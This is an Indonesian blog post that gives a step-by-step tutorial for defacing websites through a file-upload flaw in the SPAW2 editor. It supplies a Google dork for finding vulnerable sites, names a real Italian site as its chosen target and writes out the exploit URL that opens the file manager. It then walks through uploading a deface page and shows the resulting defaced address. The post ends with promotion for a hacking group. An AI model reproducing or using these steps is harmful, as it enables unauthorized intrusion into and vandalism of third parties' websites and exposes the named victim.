Selamat malam gan, lama sudah saya tidak posting diblog ini dikarenakan kesibukan pribadi, maklum anak kuliahan, kuliah sambil kerja
Baiklah kali ini saya akan share tutorial deface dengan metode SPAW, sebenarnya metode ini sudah banyak di posting di banyak blog, tapi tidak apa lah hanya untuk mengisi postingan blog saya.
Okeys, pertama silahkan cari target dengan dork ini : inurl:"spaw2/uploads/files/"
Dorknya bisa dikembangkan sendiri, misalnya menambahkan site:it pada belakang dork tersebut, contohnya : inurl:"spaw2/uploads/files/" site:it dan sebagainya :)
dan pastekan di google, maka akan muncul targetnya seperti ini !
.
Silahkan pilih salah satu target uang menurut anda vuln untuk di deface.
Disini saya memilih site ini : http://www.dlfformia.it/ sebagai target.
Kemudian masukkan exploit ini dibelakan target : spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Contoh : http://www.dlfformia.it/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Maka akan muncul seperti ini !
Pada bagian atas pilih files seperti gambar diatas dan pada kolom choose file masukkan script deface anda kemudian klik upload.
maka akan muncul seperti gambar ini !
Kemudian cari nama script yang anda upload tadi sesuai dengan nama script anda, tadi script deface saya upload bernama RACT.html kemudian klik pada nama script deface anda dan mucul seperti addres bar disamping kanan kolom tersebut, lihat pada gambar dan kemudian langsung klik download file dan deface nya pun berhasil.
http://www.dlfformia.it/spaw2/uploads/files/RACT.html
Selamat mencoba, kalau ada pertanyaan silahkan anda berikan pertanyaan pada kolom komentar, ataupun bisa hubungi kami langsung di group : RAJAWALI ACEH CYBER TEAM [RACT] OFFICIAL™
TERIMAKASIH TELAH BERKUNJUNG DIBLOG SEDERHANA INI, SEMOGA BERMANFAAT
Copy paste tok2 yg na ktpeu, that
ReplyDelete